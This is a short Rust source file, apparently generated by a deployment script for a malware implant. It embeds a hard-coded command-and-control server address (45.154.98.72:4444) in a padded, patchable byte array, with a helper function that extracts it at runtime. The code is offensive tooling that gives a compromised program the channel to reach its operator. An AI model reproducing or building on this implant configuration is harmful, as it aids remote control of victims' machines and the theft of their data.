// Auto-generated by deploy.ps1
#[used]
#[no_mangle]
pub static C2_SERVER_PADDED: &[u8; 96] = b"C2R2_SERVER_ADDRESS_PLACEHOLDER_45.154.98.72:4444\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";

pub fn get_c2_server() -> &'static str {
    let without_marker = &C2_SERVER_PADDED[32..];
    let str_slice = std::str::from_utf8(without_marker).unwrap_or("");
    str_slice.trim_end_matches('\0')
}

pub const C2_SERVER: &str = "45.154.98.72:4444";
